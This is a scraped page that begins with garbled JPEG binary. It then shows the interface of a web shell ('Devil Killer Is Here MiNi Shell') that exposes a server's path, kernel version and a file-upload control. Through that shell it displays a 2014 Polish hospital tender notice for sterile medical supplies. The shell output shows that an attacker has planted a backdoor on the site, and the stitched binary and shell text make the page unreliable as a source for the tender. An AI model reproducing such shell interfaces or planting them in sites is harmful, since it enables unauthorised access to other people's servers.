JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140422/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140422/87471-N-2014.html

<p class="kh_header"><b>Tarnowskie Góry: SUKCESYWNE  DOSTAWY  STERYLNEGO  SPRZĘTU  MEDYCZNEGO JEDNORAZOWEGO UŻYTKU</b><br>
<b>Numer ogłoszenia: 87471 - 2014; data zamieszczenia: 22.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE  DOSTAWY  STERYLNEGO  SPRZĘTU  MEDYCZNEGO JEDNORAZOWEGO UŻYTKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest są sukcesywne dostawy sterylnego sprzętu medycznego jednorazowego użytku. Zamówienie składa się z 19 części tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia:
Pakiet 1    Strzykawki, igły
Pakiet 2    Infuzja dożylna oraz przyrządy do przygotowywania leków
Pakiet 3    Kaniule, filtry i cewniki dla dzieci i noworodków 
Pakiet 4    Przyrządy do przetaczań
Pakiet 5    Przyrządy do żywienia dojelitowego
Pakiet 6    Sprzęt medyczny sterylny 1 
Pakiet 7    Sprzęt medyczny sterylny 2
Pakiet 8    Sprzęt medyczny sterylny 3
Pakiet 9    Sprzęt medyczny  sterylny 4
Pakiet 10  Sprzęt medyczny  sterylny 5
Pakiet 11  Sprzęt medyczny  sterylny 6
Pakiet 12  Sprzęt medyczny  sterylny 7
Pakiet 13  Osłona na mikroskop i przewody
Pakiet 14  Klipsy tytanowe do klipsownicy stalowej, wielorazowej Johnson & Johnson 
Pakiet 15 Sprzęt medyczny  sterylny laryngologiczny
Pakiet 16 Przyrządy do przygotowywania leków
Pakiet 17 Zestawy do infuzji
Pakiet 18 Bezigłowy system do infuzji
Pakiet 19 Zestaw infuzyjny

2. Szczegółowy opis przedmiotu zamówienia - asortyment i ilość- zawarte są w załączniku [D] SIWZ Formularz cenowy.
3. Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu.
4. Wykonawca gwarantuje, że przedmiot i warunki realizacji zamówienia w  całym okresie wykonywania umowy będą zgodne z aktualnie obowiązującymi przepisami ustawy o wyrobach medycznych z 20.05.2010r. o wyrobach medycznych (Dz. U. z 2010r. nr 107 poz. 679) oraz z innymi obowiązującymi przepisami  prawnymi w tym zakresie.
5.  Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym, co nie jest odstąpieniem od umowy nawet w części.
6. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno in plus jak i in minus, bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy, a Wykonawca wyraża na to zgodę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.10-6, 33.14.13.20-9, 33.14.12.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ
- złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również  wykonywanych głównych dostaw w okresie ostatnich trzech lat przed upływem terminu składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich  wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane oraz  załączyć dowody, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- złożyć oświadczenie według załącznika [E] do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna warunek za spełniony jeśli Wykonawca przedstawi wykaz co najmniej dwóch dostaw w przedmiocie zamówienia, o wartości zgodnie z tabelą zamieszczoną w załączniku nr [ I ]  do SIWZ, w zależności od pakietu, do którego przystępuje wykonawca (łączna wartość równa sumie wartości pakietów, na które wykonawca składa ofertę).     
     Wzór wykazu stanowi załącznik nr [H] do SIWZ;
Liczba pakietu	Wymagana wysokość wykazu dostaw w zł 
1	2
1	      36 149,97 zł 
2	      53 532,30 zł 
3	      10 774,99 zł 
4	      32 550,98 zł 
5	        3 105,54 zł 
6	        2 494,80 zł 
7	      16 948,32 zł 
8	      24 652,97 zł 
9	        2 894,34 zł 
10	        9 011,75 zł 
11	      17 525,71 zł 
12	        6 383,70 zł 
13	        5 415,60 zł 
14	        2 362,08 zł 
15	        5 513,83 zł 
16	        1 583,71 zł 
17	          881,28 zł 
18	          103,80 zł 
19	        2 640,60 zł 
SUMA	    234 526,28 zł 
Zamawiający nie wymaga złożenia dostaw wykonanych nienależycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- dla pakietu 12:
dot. poz. 6 - zaciskacz do pępowiny musi być mikrobiologicznie czysty, co należy potwierdzić poprzez dołączenie 
oświadczenia producenta	
dot. poz. 10 - Zamawiający wymaga  przedstawienia wykazu badań klinicznych oraz rekomendacji instytucji 
i towarzystw specjalistycznych dla szczoteczek do wymazów cytologicznych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C] stanowiący załącznik do SIWZ
2. Wypełniony formularz cenowy - część [D] stanowiący załącznik do SIWZ
3. Wzór oświadczeń - część [E] stanowiący załącznik do SIWZ
4. Wzór oświadczeń - część [F] stanowiący załącznik do SIWZ
5. Wzór oświadczeń - część [G] stanowiący załącznik do SIWZ
6. Wykaz dostaw - część [H]
7. Tabela wykaz dostaw - część [I]</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych, chyba, że inny punkt umowy stanowi inaczej. 
2. Strony dopuszczają zmiany umowy w zakresie:
- numeru katalogowego produktu (zmiana nr kat nie wymaga podpisania aneksu do umowy),
- nazwy handlowej produktu przy zachowaniu jego parametrów,
- gdy wystąpi przejściowy brak produktu z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego o parametrach nie gorszych od produktu objętego umową,
- gdy produkt zostanie wycofany z rynku, zostanie on zastąpiony produktem równoważnym,
- w przypadku zaprzestania produkcji produkt zastąpiony produktem równoważnym,
- w razie konieczności zmiany miejsca dostawy,
- w przypadku zmiany wielkości opakowania wprowadzonej przez producenta, z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową,
3. Wszelkie powyższe zmiany po uprzedniej akceptacji osoby odpowiedzialnej merytorycznie za realizację przedmiotu zamówienia. Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.
4. Zamawiający dopuszcza zmiany ceny korzystne dla Zamawiającego wynikające z obniżenia ceny oraz zmiany w przypadku ustawowej zmiany stawki podatku VAT (zmiany te nie wymagają podpisania aneksu do umowy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Dziale zamówień publicznych - budynek administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2014 godzina 10:30, miejsce: w Wielospecjalistycznym Szpitalu Powiatowym S.A. w Tarnowskich Górach, ul. Pyskowicka 47-51 w Sekretariacie - budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1     Strzykawki, igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość	j.m
1	Strzykawka j.uż. 2 ml z rozszerzoną skalą 3ml, tłok barwny,kontrastujący z komorą strzykawki , a 100 szt.	700	op
2	Strzykawka j.uż. 5 ml z rozszerzoną skalą 6ml, tłok barwny,kontrastujący z komorą strzykawki, a 100 szt.	900	op
3	Strzykawka j.uż. 10 ml z rozszerzoną skalą 12ml, tłok barwny,kontrastujący z komorą strzykawki, a 100 szt.	900	op
4	Strzykawka j.uż. 20 ml z rozszerzoną skalą 24ml, tłok barwny,kontrastujący z komorą strzykawki,  a 100 szt.	800	op
5	Strzykawka do podaży cytostatyków  typu omnifix trzyczęściowa luer, 10 ml a 100 szt.	6	op
6	Strzykawka do podaży cytostatyków  typu omnifix trzyczęściowa luer, 20 ml  a 100 szt.	6	op
7	Strzykawka 3-częściowa do podawania insuliny ( 100 I.U/ml) o poj. 1ml a 100szt	1	op
8	Strzykawka do podawania insuliny o poj. 1ml z zatopioną igłą 29G 1/2  0,33x12mm	100	szt
9	Strzykawka cewnikowa 50ml	1500	szt.
10	Strzykawka  do TBC z igłą 0,5x16  a 100 szt	18	op
11	Strzykawka  JANET 100 ml z podwójną skalą 	1100	szt
12	Strzykawka perfuzyjna do pomp 20ml  a 100 szt.	2	op
13	Strzykawka perfuzyjna do pomp 50 ml bursztynowa 100szt	9	op.
14	Strzykawka do pomp infuzyjnych 50ml z podwójną skalą	12500	szt
15	Igła do penów rozm. 29G (0,33 x 12,7 mm) a 100 szt.	40	op
16	Igła j.uż. 0,5 -0,9  posiadająca barwny kod odpowiadający rozmiarowi umieszczony na opak. jednostkowym a 100 szt.	1100	op
17	Igła j.uż. 1,1 - 1,2posiadająca barwny kod odpowiadający rozmiarowi umieszczony na opak. jednostkowym  a 100 szt.	800	op
18	Igła motylek z końcówką luer-lock w rozmiarach: 18G, 19G, 20G, 21G, 22G, 23G, 25G, 	30	szt
19	Igła do bezpiecznego pobierania leku, jałowa 1,2 x 30-40 mm (18G)  a 100 szt.  	900	op
20	Strzykawka  JANET 100 ml z podwójną skalą z dodatkową końcówką wielkości ok 2,5cm ściętą pod kątem 45 st.	300	szt
1. Wymagania dotyczące pozycji 12; 13 - strzykawka do pomp infuzyjnych,  3-częściowa, bezlateksowa, wykonana z polipropylenu, z końcówka luer-lock, posiadającą podwójne gumowe uszczelnienie tłoka oraz dodatkową blokadę zapobiegającą niekontrolowanemu wysunięciu tłoka z komory strzykawkowej tj. dodatkowe ożebrowanie poprzeczne tłoku i rowek w  komorze strzykawki. Skala kontrastująca, czytelna. na końcu tłoka specjalne wycięcie na uchwyt pompy, kompatybilna z zaleceniami producenta pomp.                                              	
	
2. Do oferty należy dołączyć: katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  

3. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.10-6, 33.14.13.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2 Infuzja dożylna oraz przyrządy do przygotowywania leków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość szt
1	Kaniula bezpieczna typu wenflon dożylna obwodowa  z wbudowanym plastikowym lub metalowym elementem bezpieczeństwa pasywnego nakrywający igłę po wyjęciu w celu zapobiegania przypadkowemu nakłuciu,posiadająca filtr hydrofobowy, wykonana z poliuretanu, wykończona korkiem standardowym z portem bocznym z samodomykającym się korkiem, jałowa, apirogenna, nietoksyczna,z kontrastem Rtg ( min 3 linie )                   0,7x19 mm 24G żółta, przepływ 23ml/min                             0,9 x  25mm  22 G niebieska .min  przepływ 36-42 ml/min.,  1,1x 25mm  20 G różowa  min. przepływ 65-67ml/min,                 1,1 x od 32-33mm  20 G różowa  min. przepływ od 61-67 ml/min,1,3x  od 32- 33mm  18 G zielona  min przepływ od 95 -103 ml/min, 1,3  x 45 mm  18 G zielona min. przepływ 95 -103 ml/min	40000
2	Kaniula typu wenflon dożylna obwodowa ,posiadająca filtr hydrofobowy, wykonana z PTFE, wykończona korkiem standardowym, z portem bocznym z samodomykającym się korkiem, jałowa, apirogenna, nietoksyczna,z kontrastem Rtg ( min 2 linie )        0,7x19mm 24G zółta przepływ 20ml/min                0,9 x  25mm  22 G niebieska .min  przepływ 36-42 ml/min.,   1,1 x od 32-33mm  20 G różowa  min. przepływ od 60-67 ml/min,1,3  x 45 mm  18 G zielona min. przepływ 90 -103 ml/min, 1,5x45mm 17G biała przepływ od125ml -128 ml/min, 1,7 x45mm 16G szara przepływ od 180 do 196ml/min, 2,1x45mm 15G pomarańczowa przepływ 270-300ml/min	4000
3	Kaniula dożylna obwodowa wykonana z FEP lub PTFE posiadająca filtr hydrofobowy, port boczny,samodomykający się korek,jałowa, nietoksyczna, apirogenna,z kontrastem Rtg (min 2 linie ),wbudowany plastikowy lub metalowy element bezpieczeństwa pasywnego,nakrywający igłę po wyjęciu w celu zapobiegania przypadkowemu nakłuciu, 26 G fioletowa od 0,6 do 0,62 x19mm przepływ 17ml/min	600
3	Koreczki do kaniul dożylnych standardowe, kompatybilne z kaniulą	20000
4	Koreczki typu Combi w trzech kolorach :niebieski,czerwony, biały	300
5	Kranik trójdrożny  stosowany w terapii infuzyjnej i transfuzyjnej z optycznym identyfikatorem położenia	2300
6	Kranik trójdrożny z przedłużaczem 7cm,10 cm , 25 cm	600
7	Mandryn z zamknięciem luer-lok	50
1 Do oferty należy dołączyć: katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.    

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
